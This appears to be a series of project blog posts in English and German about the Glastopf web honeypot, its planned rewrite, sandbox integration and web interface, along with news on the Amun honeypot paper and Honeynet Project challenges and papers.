GlasBlog

Today I will talk a bit about Glastopf and whats coming up the next months.

Glastopf:
Last Friday (22.01.) I met Sven. Sven is a bachelor student at the Bern university of applied sciences and will write his thesis about Glastopf. During his work he will make a total rewrite but when he will be finished the new version will have at least the same features like the old version. Those are the goals: A much better modular structure, this means there is one core which directs every request to the modules. They store the data, emulating the vulnerability and compose the response which the core gives back to the attacker. And there will be a much better classification of incoming attacks and the rules used for that will be totally detached from the source code to distribute them easily between different sensors. I will post some details as soon we started the work. This also means that we will freeze the current unstable version to put all effort into the new version.

PHP Sandbox:
I’m working on a connection between Glastopf and a PHP sandbox to classify the collected samples. Furthermore there is the possibility to reply common requests to a Glastopf sensor with the same perfectly emulated reply from the sandbox. The collected bots have a great potential to help us to do some research on web server botnets. More postings about this topic will follow.

Project:
We are also looking forward to intense our cooperations with interested universities and corporations. Especially with 1and1 and the Bern university of applied sciences. We are also officially integrating some peoples into the project who are already working on different parts in it.

Meeting:
End of March we are planning a meeting of all peoples interested in the project in Karlsruhe Germany. Goal is to push further the discussions, exchange knowledge, get to know each other and of curse drink some beer :) . There will be also some short talks on how we go further with the project and some of us will talk about how they use Glastopf. More information and in a near future the schedule, could be found in our wiki: GlasCon-3-2010

To move Glastopfs support away from the IRC data nirvana, we got a mailing list from the honeynet project. You can subscribe on the web interface: Mailman and browse the yet glorious archive right here: Pipermail. I’m looking forward to see some good discussions ;)

Jan Göbel hat einen ausführlichen Bericht über seinen low-interaction Honeypot Amun geschrieben. Das Paper zeigt ausführlich die Funktionsweise von Amun und wurde in der Hoffnung geschrieben einen tiefen Einblick zu geben um das Beisteuern von Schwachstellen Modulen zu fördern.

Englische Zusammenfassung:

In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures

Das Paper ist in der elektronischen Bibliothek der Uni Mannheim als PDF verfügbar.

Das Honeynet Project hat das erste Forensic Challenge für das Jahr 2010 veröffentlicht. In diesem von Tillmann Werner erstellten Challenge geht es um ein pcap attack trace den es zu analysieren gilt. Genaue Informationen und den Trace gibt es auf der Projektseite.

Since a few days the Glastopf web interface version 0.0.1 first release candidate is available. Information about how to set up and the needed files could be found at our repository. This new web interface allows you to visualize and draw first conclusions about data collected with Glastopf.

Those who are using Glastopf have certainly thought about how to evaluate and further use the collected data. First we have the SURFids plug-in which allows you the use the SURFids web interface as a data analysis front end. If you prefer the easy way, send you data to the central database and use its web interface. Last but not least there is a web interface developed by peoples from the Glastopf project but it got a bit neglected the last months. Marcel Koßin noticed this lack and put a lot of effort into a rework. As soon the first version is finished and the repository works properly we will release more details and the source.

Since one year Glastopf is available for public. There has been a lot of changes during this year. Glastopf has been developed in many aspects and I’ve found many peoples (or they found me) who are very interested in the project and now working together with me. The coming year will bring a lot of changes, amongst others there will be an improvement of the attack classification, integration of a PHP sandbox, refinement of the vulnerability emulator and the development of the web interface. If nothing goes wrong I’ll be also able to write more documentation.

The Honeynet Project has announce the publication of the first paper in the new Know Your Tools paper series: “KYT: use Picviz to find attacks” authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

Since the Google Summer of Code 2009 I’m working together with the Honeynet Project and in retrospection I’ve benefited a lot from it and met excellent peoples. The Honeynet Project provides direct access to most of the peoples who are pathbreaking involved in Honeypot development and research. Since a few days I’m an official member of the Honeynet Chicago Chapter which provides me the possibility to give back my knowledge to the project.

Konrad Rieck bemerkte zu Recht, dass der Glastopf keinerlei Möglichkeit besitzt die rohen Daten eines Angreifers abzulegen. Er hat ein Plug-in geschrieben das eben diese Aufgabe erfüllt.
Ich habe es ein wenig angepasst und in den Glastopf eingepflegt. Nun wird täglich ein File angelegt das sämtliche Daten der an diesem Tag registrierten Events enthält.